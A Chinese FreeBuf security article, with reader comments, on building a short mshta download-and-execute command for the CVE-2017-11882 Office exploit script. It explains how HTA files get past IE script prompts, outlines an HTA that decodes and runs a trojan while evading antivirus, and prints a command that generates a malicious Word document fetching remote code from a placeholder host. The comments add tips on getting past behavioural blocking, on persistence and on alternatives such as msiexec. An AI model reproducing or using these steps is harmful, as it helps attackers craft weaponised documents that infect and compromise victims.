mshta.exe
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
浅谈一下mshta在CVE-2017-11882里的命令构造 lcx2017-12-01现金奖励共500498人围观 ,发现 20 个不明物体 WEB安全
* 本文作者:lcx,本文属FreeBuf原创奖励计划,未经许可禁止转载
Evi1cg同学前不久放出CVE-2017-11882的一个 python利用脚本,地址在https://github.com/Ridter/CVE-2017-11882/,不过其中一个版本里边有一个限制,执行命令只能用43个字节。如果要用43个字节来完成一个文件的下载执行,在我所掌握的命令行知识里,除了mshta命令,其它的好像都做不到。所以在这里我就浅谈一下如何构造这个mshta命令,另外提一下hta文件在安全方面的一个应用。
mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件。HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。mshta执行.hta文件,是以当前用户权限执行,hta文件可以随便改后缀,也可以本地或远程执行,本地执行的时候,要记得带全路径名,否则会出错。另外,mshta支持各种协议,甚至支持mk:@MSITStore协议或是ms-its协议。
timg.jpg
一、HTA文件 内嵌的html文件如何去除本地安全认证呢?
我们知道,html文件打开的宿主如果是IE,html文件里调用的是像Wscript.Shell此类组件的话,IE会弹一个框,限制运行脚本或Active控件。我们来验证一下,写代码1.htm如下:
1.png
如果我们用HTA文件来iframe这个1.htm,hta是本地用户权限,应当可以绕过此限制,如何绕呢?我们就要用到 iframe的一个参数了application=”yes”了。这样就不会弹阻止框了,可以干坏事了,1.hta代码如下:
二、如何写一个高效的下载执行过杀软的hta文件?
如果是下载执行的话,哪就很弱了。hta文件里可以自由地写vbscript代码,所以我们的思路是可以把你的木马转换成base64格式也好,转换成16进制也好再转回来,hta只是访问了一个网页而已,但是已经把木马转到本地了,具体代码1.hta可以如下:
然后,你可以把这个1.hta改名1.xml之类的文件放在远程空间了,直接mshta http://www.site.xom/1.xml,就可以了。如果是利用CVE-2017-11882.py,哪么直接执行下边命令就生成了,其中http://site.com/1.xml你可以换成短网址。
python27 Command_CVE-2017-11882.py -c "mshta http://site.com/1.xml" -o test.doc
下图是我做的测试图。
2.png
* 本文作者:lcx,本文属FreeBuf原创奖励计划,未经许可禁止转载
lcx
5 篇文章
等级: 3级
||
上一篇:企业安全经验 | 应急响应的战争下一篇:利用Burp Suite挖掘暗网服务的真实IP
这些评论亮了
lcx (3级)回复
@ hjchjcjh 你说的都不对。核攻击和我不是同一个人。我是海阳顶端asp木马的作者。lcx.exe虽然是我修改编译自htran1.0的,并写篇文章让大家都了解了lcx.exe用法,但原作者也不是我呀,是以前大名鼎鼎的lion呀,并且htran最终版本到2.4。关于lcx.exe这个事太多人问我了,唉,让我很惭愧。
)7(亮了
发表评论已有 20 条评论
jimoyong (5级) 2017-12-01回复 1楼
不错
亮了(0)
hjchjcjh (3级) 愿漂泊的人都有酒喝 孤独的人都会唱歌 2017-12-01回复 2楼
lcx?请问你是核攻击还是lcx.exe的作者呢?
亮了(1)
lcx (3级) 2017-12-01回复
@ hjchjcjh 你说的都不对。核攻击和我不是同一个人。我是海阳顶端asp木马的作者。lcx.exe虽然是我修改编译自htran1.0的,并写篇文章让大家都了解了lcx.exe用法,但原作者也不是我呀,是以前大名鼎鼎的lion呀,并且htran最终版本到2.4。关于lcx.exe这个事太多人问我了,唉,让我很惭愧。
亮了(7)
guest 2017-12-01回复
@ hjchjcjh 我猜是lcx.exe作者,btw, 核jj就是个()自己填空。
亮了(0)
yllen 2017-12-01回复 3楼
所以一个“延迟启动”方式的WriteBin绕过了哪家的主防?
亮了(0)
lcx (3级) 2017-12-01回复
@ yllen 如果不是调用了mshta , 是VBS的话,用WriteBin你试一下,过所有主防。主防只是提醒调用了一下mshta 。这里的hta是没办法过主防的,因为受到一些限制。主防不会阻止一个vbs防问一个xml文件,用hta有提醒。再是你把里边的vbs代码提取出来,写sct也好,写wsf也好,代码都直接能用。
亮了(0)
yllen 2017-12-01回复
@ lcx 重点是writebin没问题,你写注册表启动项有问题,大兄弟
亮了(0)
lcx (3级) 2017-12-01回复
@ yllen 是的,你没看我在程序里的注释:’用rundll32加启动项,这个过不了杀软主防,聊胜于无。我过主防的启动项方法肯定不能放出来呀。程序里这个方法最早是过的,用了半个月让360给抓了。
亮了(2)
yllen 2017-12-01回复
@ lcx 哈哈,lcx兄弟是haiyang那个吗
亮了(0)
lcx (3级) 2017-12-01回复
@ yllen 是我
亮了(1)
lr3800_ (4级) 安全猎人 lr3800.com 2017-12-01回复 4楼
你这酱紫也过不了杀软主动防御,写16进制文件不做免杀一样执行不了;为什么要大费周折;一句话的命令不是照样下载执行木马
亮了(1)
lcx (3级) 2017-12-01回复
@ lr3800_ 我这不是这载执行的,只是访问了一个网页,明白吗?再是你一句话下载执行放到c:\,你考虑了权限的问题没有,在WIN10下你根本下载不到c盘,还有一大批用户只有一个c盘,特别是国外的人。
亮了(1)
谢谢楼主 2017-12-01回复
老C啊,好久不见,还这么专注于技术,真心佩服啊。
亮了(0)
yuanyunfeng3 (1级) 2017-12-01回复
@ lcx win10下c:\windows\temp可以写的吧
亮了(2)
unamer 2017-12-01回复 5楼
我表示直接代码执行更好用
亮了(1)
asdxz (1级) 2017-12-10回复
@ unamer 这是一种姿势,不光可以用在2017-11882
亮了(0)
死宅10086 (7级) 2017-12-01回复 6楼
亮了(1)
m′哽咽 (1级) 2017-12-01回复 7楼
钱是多了,但是回复比写还累.弄不好还挨顿喷
亮了(1)
n0jobs (1级) 2017-12-05回复 8楼
学习了,非常感谢!!!!
亮了(0)
1111 2017-12-06回复 9楼
用43个字节来完成一个文件的下载执行,还可以用msiexec
可以参考这篇文章:
https://xianzhi.aliyun.com/forum/topic/1649/
亮了(1)
昵称
请输入昵称
必须您当前尚未登录。登陆?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
lcx
这家伙太懒,还未填写个人描述!
5
文章数
27
评论数
最近文章
捡拾VBS应用层里的明珠
2018.02.22
命令行下的“蒙面歌王”rundll32.exe
2018.01.29
浅谈一下mshta在CVE-2017-11882里的命令构造
2017.12.01
浏览更多
相关阅读
腾讯反病毒实验室预警:CVE-2017-11882漏洞最新利用方法隐藏17年的Office远程代码执行漏洞POC样本分析(CVE-2017-11882)利用了Office公式编辑器特殊处理逻辑的最新免杀技术分析(CVE-2017-11882)CVE-2017-11882新动态:利用AutoIT脚本释放DarkComet后门浅谈一下mshta在CVE-2017-11882里的命令构造
特别推荐
关注我们 分享每日精选文章
活动预告
11月
FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月
【16课时-连载中】挖掘CVE不是梦(系列课程2)
已结束
10月
【首节课仅需1元】挖掘CVE不是梦
已结束
9月
【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php0daybank
文章评论